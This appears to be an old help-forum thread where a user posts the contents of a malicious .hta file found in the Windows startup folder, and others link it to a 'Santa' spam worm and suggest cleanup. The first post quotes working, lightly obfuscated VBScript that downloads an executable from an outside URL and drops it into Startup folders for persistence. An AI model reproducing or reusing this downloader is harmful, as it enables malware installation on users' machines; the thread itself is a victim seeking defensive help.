funny files in startup folder

  • Thread starter Thread starter Cyber-Hun
  • Start date Start date
C

Cyber-Hun

I found a couple strange little files in my startup folder
( C:\Documents and Settings\All Users\Start Menu\Programs),
one file was called msoffice.hta, and the other was officeOSA.exe (0 bytes).
My scanners(TCMonitor, TCActive) aren't triggered by these files, but I'm
pretty suspicious, given that the .hta file contained the following::
-------------------
set o = CreateObject("m"+"sxml2.XML"+"HTTP") :
o.open "GET","http://paddy.home.comcast.net/xp.exe",False :
o.send :
set s = createobject("ad"+"odb"+".stre"+"am") :
s.type=1 :
s.open :
s.write o.responseBody :
s.savetofile "C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\OfficeOSA.exe",2 :
s.savetofile "C:\Dokumente und Einstellungen\All
Users\Startmenu\Programme\Autostart\OfficeOSA.exe",2 :
window.self.close() :
--------------------------
I'm not fluent in vbscript, but doesn't this code get stuff from that
comcast url, and then put it in these files that it creates in the startup
folder?
Presumably it's supposed to run the 'stuff' it fetched from the comcast URL,
whatever it is, every time I reboot. Doesn't just the fact that this has
occurred at all indicate a breach? I don't know if I should be alarmed or
not, my scanners show me all the other places where malicious files can be
put where they will be automaticaly run (runonce, runservices, etc) and
there is nothing else there.
Can anyone fill me in on this, or relate similar occurrences?
 
yep, funny for sure... that was apparently part of that 'santa like you have
never seen him before' spam from some kind of virus/worm. start scanning,
and keep scanning until you find it. spybot, adaware, hijackthis, etc, etc,
etc...
 
Cyber-Hun said:
I found a couple strange little files in my startup folder
( C:\Documents and Settings\All Users\Start Menu\Programs),
one file was called msoffice.hta, and the other was officeOSA.exe (0 bytes).
My scanners(TCMonitor, TCActive) aren't triggered by these files, but I'm
pretty suspicious, given that the .hta file contained the following::
Click to expand...

I have that too.

It has now stopped me from using any anti-virus tools. Anything with virus
in the title and the window is closed !

I can't even search the net for a remedy - this is going to cause me some
trouble.
 
I posted this in the comp.virus group, and apparently its an exploit called
bloodhound 21 or something and it was caused by that post; "Santa like you
have never seen before".
 
Cyber-Hun said:
I posted this in the comp.virus group, and apparently its an exploit called
bloodhound 21 or something and it was caused by that post; "Santa like you
have never seen before".
Click to expand...

Guess what - I looked at that !!!

It was in a binaries group that I visit and I thought it was a picture of an
aeroplane ! ( Silly Bunt!!)

Thanks for that I'll keep looking..
 
I'm not an expert in this field, but it sounds you like you need a thorough
cleanup, amigo --- safe mode, roll-back, and all of that. I've learned my
lesson, I'm de-activating all my scripting and activex stuff, and maybe
switching to firefox.
Good luck, and keep us posted on your progress. btw happy new years!
 
Back
Top